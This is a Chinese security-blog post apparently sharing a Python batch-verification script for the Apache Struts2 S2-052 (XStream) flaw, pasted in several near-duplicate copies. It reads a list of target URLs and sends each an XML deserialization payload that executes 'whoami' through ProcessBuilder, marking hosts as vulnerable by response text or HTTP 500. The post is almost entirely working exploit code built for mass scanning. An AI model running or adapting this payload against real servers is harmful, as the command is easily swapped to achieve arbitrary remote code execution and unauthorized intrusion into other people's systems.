ST2-052批量验证脚本

SecJack 工具分享 2017-09-07

2449 0 0

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
url_list_path ="/home/d0ll4r/St2_052/UrlList.txt"
s= requests.session()
s.keep_alive = False
headers = {  
    "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6",
    "Content-Type":"application/xml"}
files = '''<map> 
<entry> 
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command><string>whoami</string></command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
</entry> 
</map>
''' 
with open("%s"%url_list_path) as f:
    for url in f.readlines():
        try:
            res_content = s.post("%s"%url,verify=False,headers=headers,data=files).content
        except requests.exceptions.ConnectionError:
            res_content = "Connection refused"

        if "xstream" in res_content:
            print "found:",url

#!/usr/bin/env python

#-*- coding:utf-8 -*-

import requests

url_list_path ="/home/d0ll4r/St2_052/UrlList.txt"

s= requests.session()

s.keep_alive = False

headers = {

"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6",

"Content-Type":"application/xml"}

files = '''<map>

<entry>

<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command><string>whoami</string></command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>

</entry>

</map>

'''

with open("%s"%url_list_path) as f:

for url in f.readlines():

try:

res_content = s.post("%s"%url,verify=False,headers=headers,data=files).content

except requests.exceptions.ConnectionError:

res_content = "Connection refused"

if "xstream" in res_content:

print "found:",url

url_list_path替换成URL文本

以上根据特征码xstream判断，可替换成其他的提高准确性。

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import requests
url_list_path ="/home/d0ll4r/St2_052/UrlList.txt"
s= requests.session()
s.keep_alive = False
headers = {  
    "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6",
    "Content-Type":"application/xml"}
files = '''<map> 
<entry> 
<jdk.nashorn.internal.objects.NativeString> <flags>0</flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>false</initialized> <opmode>0</opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command><string>whoami</string></command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> <done>false</done> <ostart>0</ostart> <ofinish>0</ofinish> <closed>false</closed> </is> <consumed>false</consumed> </dataSource> <transferFlavors/> </dataHandler> <dataLen>0</dataLen> </value> </jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> </entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
</entry> 
</map>
''' 
with open("%s"%url_list_path) as f:
    for url in f.readlines():
        try:
            res_code = s.post("%s"%url,verify=False,headers=headers,data=files).status_code
        except requests.exceptions.ConnectionError:
            res_code = "Connection refused"

        if res_code == 500:
            print "found status_code 500:",url

#!/usr/bin/env python

#-*- coding:utf-8 -*-

import requests

url_list_path ="/home/d0ll4r/St2_052/UrlList.txt"

s= requests.session()

s.keep_alive = False

headers = {

"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6",

"Content-Type":"application/xml"}

files = '''<map>

<entry>

</entry>

</map>

'''

with open("%s"%url_list_path) as f:

for url in f.readlines():

try:

res_code = s.post("%s"%url,verify=False,headers=headers,data=files).status_code

except requests.exceptions.ConnectionError:

res_code = "Connection refused"

if res_code == 500:

print "found status_code 500:",url

本文由安全周作者：SecJack 发表，转载请注明来源！

关键词：st052

工具分享

ST2-052批量验证脚本

SecJack

相关文章

使用frp配置内网穿透

对数据库进行中间人攻击

使用Docker构建Web渗透测试工具容器

热评文章

最赞的文章

发表评论